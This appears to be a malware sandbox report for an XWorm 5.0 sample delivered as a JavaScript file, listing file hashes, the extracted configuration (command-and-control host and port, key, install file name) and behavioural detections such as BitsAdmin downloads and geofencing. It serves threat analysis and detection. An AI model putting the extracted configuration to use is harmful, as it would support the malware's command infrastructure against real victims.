General
-
Target
023d1fc5d2c9b764979305703c8fe402f8776e073cd739f8b924a3b5a2f6050d
-
Size
5KB
-
Sample
240830-geqldszhql
-
MD5
82d7ae4b17d62b79fcfeb2916d09b295
-
SHA1
a47bea5ac4dafb57cbf16dcb84e3c2ed01f9199c
-
SHA256
023d1fc5d2c9b764979305703c8fe402f8776e073cd739f8b924a3b5a2f6050d
-
SHA512
de6befa9a4d5e3c0ed71c60b7229955b3e59f6a8367b9f1bd2809192d8689179266ba2b057484e76f9db16bb8cc41554ae9d1db1c2ddd399f36a4cf2fc68e1ce
-
SSDEEP
96:y7kkYGfUvclZzbqCnXjjwUNhH44nN8bhgV+tW8S4/bSqtYPmXjCSvI7shhVHfyXH:MNeYxVnXjjwUNhDNWy+tB9bSdPmTCSvY
Static task
static1
Behavioral task
behavioral1
Sample
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
Resource
win7-20240729-en
Malware Config
Extracted
xworm
5.0
yolomesho.work.gd:7000
oUFURe5xwVr67Kd5
-
install_file
USB.exe
Targets
-
-
Target
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
-
Size
441KB
-
MD5
c7e47553b94c0d18ecf9e03b5ffec68b
-
SHA1
bfb60db9ad9e0bd41ee2335acaa6316264c0b638
-
SHA256
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a
-
SHA512
5a624285b1d9179939495c0f2baa4ecfb7cc9561098977be825ab83b6c90d5e86b4571f5cfa603d9e5e2be76b8e84153a607f26b4263cbff908bb5aca2201194
-
SSDEEP
384:JeeeeeeeeeeeRReeeeeeeeeeeReeeeeeeeeeezeeeeeeeeeee8eeeeeeeeeeeRe4:Heo
-
Detect Xworm Payload
-
Blocklisted process makes network request
-
Download via BitsAdmin
-
Checks computer location settings
Looks up country code configured in the registry, likely geofence.
-
Looks up external IP address via web service
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of SetThreadContext
-